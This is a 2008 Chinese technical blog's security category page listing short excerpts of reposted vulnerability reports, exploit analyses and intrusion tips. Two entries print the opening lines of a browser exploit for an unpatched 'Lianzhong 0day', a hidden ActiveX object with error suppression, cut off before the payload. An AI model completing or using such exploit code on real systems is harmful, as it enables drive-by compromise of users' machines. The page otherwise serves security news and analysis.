黑客&安全 - 水煮豆豆_网络爬爬 - 51CTO技术博客-领先的IT技术博客

文章

QQ Mail跨站脚本漏洞

2008-07-15 07:53:07

漏洞说明：QQ Mail是Tencent公司提供的webmail服务，你可以使用你的QQ帐户来登陆使用Mail服务，具体的信息可以访问
 http://mail.qq.com/。但是80sec团队成员在QQ Mail里发现存在跨站脚本漏洞，恶意用户可以通过该漏洞在邮件里伪造登陆表
单窃取目标用户的密码以及偷取Cookie以取得其他用户的身份，或者使用ajax等技术读取用户的敏感信息。

漏洞成因：QQ Mail的Javascript Dom部分在处理邮件内容，对邮件内容字符串的处理分为str和code两个流程，通过组合的标签内
容可以误导Javascript处理图片内容和文字链接进入str流程，..

类别：黑客&安全 | 阅读全文(9) | 回复(0)

[Ph4nt0m]_微软发布3款SQL_Injection攻击检测工具

2008-06-27 08:35:51

随着 SQL INJECTION 攻击的明显增多，微软近日发布了三个免费工具，帮助网站管理员和检测存在的风险并对可能的攻击进行拦截。

Scrawlr
下载地址：https://download.spidynamics.com/Products/scrawlr/

这个微软和 HP合作开发的工具，会在网站中爬行，对所有网页的查询字符串进行分析并发现其中的 SQL INJECTION 风险。Scrawlr 使用了部分 HP WebInspect 相同的技术，但只检测 SQL INJECTION 风险。Scrawlr 从一个起始 URL 入口，爬遍整个网站，并对站点中所有网页进行分析以找到可能存在的漏洞。

Microsoft Source Code..

类别：黑客&安全 | 阅读全文(29) | 回复(0)

分析一个flash exploit的样本

2008-06-24 07:57:39

By dm

http://hi.baidu.com/int3/blog/item/201318c61bc9721e9c163d4d.html

有不少朋友一直怂恿我写这么一个马后炮分析的文章，也拖了好久，现在放出来了。

首先感谢Mark Dowd发现这个漏洞并且分享了一些关于这个漏洞通用利用的方法。

再阅读这篇blog之前，请熟读Mark Dowd关于Flash exploit的whitepaper和Flash 9文
件格式以及Adobe关于AVM2的详细文档。先简单的回顾一下flash文件格式，一个SWF文
件是由SWF header和若干tag来组成的。

SWF Header Format

<[url]http://hiphotos.baidu.co..

类别：黑客&安全 | 阅读全文(42) | 回复(0)

MDaemon v9.6.5 Multiple Remote Buffer Overflow

2008-06-04 07:35:24

以下消息来自幻影论坛[Ph4nt0m]邮件组
############################################################################
# MDaemon <== v9.6.5 Multiple Remote Buffer Overflow
#
# Vendor Site: http://altn.com
#
# Risk : Highly Critical
# hehe funny bugs here .. the worldclient use the port 3000 for a webmail
like (it use also an admin webmail
# located at
# port 1000 [by default both are opened])
# this file unfortunatly contain multiple buffer overflows , If you send a
message to a u..

类别：黑客&安全 | 阅读全文(22) | 回复(0)

flash漏洞所用shellcode的分析

2008-06-03 07:36:40

作者blog上的分析有排版问题，所以转的是pediy上的。
-------------------------

标题: 【原创】flash漏洞所用shellcode的分析
作者: 轩辕小聪
时间: 2008-06-02,19:29
链接: http://bbs.pediy.com/showthread.php?t=65907

作者主页: http://hi.baidu.com/yicong2007
目的: 纯属学习，请勿用于恶意用途

最近几天flash漏洞的网马非常流行，于是我想分析一下shellcode是怎么跑的。

但是能力所限，还难以像大牛们一样定位到有漏洞的代码及观察整个溢出过程。于
是，我只能做后面一部分工作，即看看那个畸�..

类别：黑客&安全 | 阅读全文(25) | 回复(0)

我在入侵过程中注意到的细节

2008-05-28 07:44:48

以下消息来自幻影论坛[Ph4nt0m]邮件组

《黑客手册200801》

我在入侵过程中注意到的细节（一）
　　　　lcx

细节决定成败，不但对于写程序、渗透入侵甚至人生都是如此。谈人生就有点深奥了，
还是来谈谈入侵吧。记得很久前有一位同事，注入的时候，在sa权限什么命令都能执
行的情况下竟然入侵花费了三天左右的时间，为什么呢？这是因为他在NBSI下输了个
time命令，想看下服务器的时间，结果命令无法应答，注入点宕在哪儿了，再也没办
法执行其它命令了，直到服务器重启。有的写的不好的木马，如果执行time命令也会自
动退�..

类别：黑客&安全 | 阅读全文(103) | 回复(0)

怒不可遏，提高警惕！——是谁屌了红十字会的网站？

2008-05-18 19:57:39

以下消息来自幻影论坛[Ph4nt0m]邮件组

[Ph4nt0m] 是谁屌了红十字会的网站？

remax 发送至 Ph4nt0m
显示详细信息 5月17日 (2天前) 回复

我就操他全家了

哪里来的废物

这种钱都敢要

花的时候心安吗

我操操操操操！！！！！！！！

http://msn.ynet.com/view.jsp?oid=40496059
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件，请发到 ph4nt0m@googlegroups.com
要退订此邮件，请发邮件至 [email]..

类别：黑客&安全 | 阅读全文(117) | 回复(2)

黑客发现一个系统内新的Rootkit藏匿之地---SSM

2008-05-13 08:31:02

以下消息来自幻影论坛[Ph4nt0m]邮件组

5月11日消息，安全研究机构日前开发出了一款新型恶意rootkit软件，该软件能够隐藏于电脑微处理器不太显眼的位置，可以逃过当前反病毒程序的扫描。

据国外媒体报道，这款新软件名为系统管理模式（SMM）rootkit，可运行于电脑内存受保护的一个区域，并且在操作系统中不可见，不过攻击者却能够借此“窥视”电脑内存中发生的全部过程。

SMM rootkit软件中包含键盘记录和通信软件，可以借此窃取受害者的敏感信息，该软件是由肖恩·埃伯拉顿（Shawn Embleton）开发的。埃伯拉顿经营着一家名�..

类别：黑客&安全 | 阅读全文(151) | 回复(2)

SSClone非ARP会话劫持原理分析

2008-05-09 08:15:17

ph4nt0m，你好
来自：www.csna.net
作者：robur

前两天买的过期杂志上看到的一款软件，刚开始还没注意，后来就恨自己杂志买晚了。（今年3月份的《黑客防线》）
那个神奇的软件，就像我标题上说的，叫SSClone，解释起来就是：Switch Session Clone，也就是"交换机会话克隆"（纯字面翻译，纯的～

）。

这个软件有什么用？其特点就是可以不通过传统的ARP欺骗方法，来实现局域网内的会话监听、劫持、复制等操作。（其实这个软件本身是用来会话复制的，也就是拦截客户机发送给网关的数据包，如果拦截网关发送给客户�..

类别：黑客&安全 | 阅读全文(54) | 回复(1)

Yahoo! 助手(3721) ActiveX远程代码执行漏洞

2008-05-09 08:07:39

以下消息来自幻影论坛[Ph4nt0m]邮件组

呵呵
顺便说下,那天想利用flash9 action script 3往localhost发包来利用xunlei的那个本地洞. 失败.
flash的安全验证无法绕过:
用Socket connect()过去就是请求domain-policy,如果有应答,则断开此连接.然后再开连接进行实际的数据交互.

void
2008-05-08

发件人：大风
发送时间： 2008-05-08 11:06:03
收件人： ph4nt0m@googlegroups.com
抄送：
主题： [Ph4nt0m] 答复: [Ph4nt0m] Re: 答复: [Ph4nt0m] Re: Yahoo! 助手(3721) Ac..

类别：黑客&安全 | 阅读全文(29) | 回复(0)

Adobe Acrobat Professional Vulnerabilities

2008-05-08 07:52:11

以下消息来自幻影论坛[Ph4nt0m]邮件组

Adobe Acrobat Professional Javascript For PDF Security Feature Bypass and Memory Corruption Vulnerabilities

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net

Summary:
Two critical vulnerabilities exist in the javascript API of Adobe Acrobat Professional 7. A remote attacker who successfully exploits these vulnerabilities can execute restricted functions and arbitrary codes on the affected syste..

类别：黑客&安全 | 阅读全文(20) | 回复(0)

ORACLE_LATERAL-SQL-INJECTION_个人见解

2008-05-07 09:43:43

以下消息来自幻影论坛[Ph4nt0m]邮件组

原PAPER地址：
http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

          author : kj021320
          team : I.S.T.O

            最近忙啊忙啊的，今天终于有点点时间抽出来看看技术文章了，最近国外又出了关于新型ORA注入技术的PAPER，赶紧测试，主要是出现在SQL语..

类别：黑客&安全 | 阅读全文(9) | 回复(0)

联众的0day,目前通杀所有版本

2008-05-07 09:41:31

以下消息来自幻影论坛[Ph4nt0m]邮件组

代码如下:
联众的0day,目前通杀所有版本
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
document.writeln("<object classid=\"clsid:61F5C358-60FB-4A23-A312-
D2B556620F20\" style=\'display:none\' id=\'Kazakh\'><\/object>");
document.writeln("<SCRIPT language=\"javascript\">");
document.writeln("var Wolfdalef,Wolfdalek,QuadroXFX;");
document.writeln("var
Samsunga1,Samsunga2,Samsunga3,Samsunga4,Samsung..

类别：黑客&安全 | 阅读全文(40) | 回复(1)

未公布的联众exploit 0Day

2008-05-04 08:23:13

以下消息来自幻影论坛[Ph4nt0m]邮件组
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
document.writeln("<object classid=\"clsid:61F5C358-60FB-4A23-A312-D2B556620F20\" style=\'display:none\' id=\'Kazakh\'><\/object>");
document.writeln("<SCRIPT language=\"javascript\">");
document.writeln("var Wolfdalef,Wolfdalek,QuadroXFX;");
document.writeln("var Samsunga1,Samsunga2,Samsunga3,Samsunga4,Samsunga5,Samsunga6,Samsunga7;");
document.writeln("va..

类别：黑客&安全 | 阅读全文(76) | 回复(2)

又见0day! [FlashGet]-FG2CatchUrl Crash POC

2008-04-25 08:24:37

以下消息来自幻影论坛[Ph4nt0m]邮件组

说实话flashget2.0一点也不好用
在ms拖win 2k3都拖了几天
最后一怒之下装了个1。7几的版本不到一个上午搞定
新版本既不稳定算法又差，让人难以接受

2008/4/23 remax <remax.z@gmail.com>:

也就只能d.o.s了吧..

On 4月23日, 下午9时53分, "kook1991" <wek...@163.com> wrote:
> FlashGet 2.0 正式版的0day 早在2.0bate版就有这个BUG 当时发现了但是比较忙就扔下了
>
> 今天看见出正式版了下载回来试了一下软件更新 BUG犹在于是乎把POC放出�..

类别：黑客&安全 | 阅读全文(64) | 回复(0)

<< 1 2 3 >> 页数 ( 1/3 )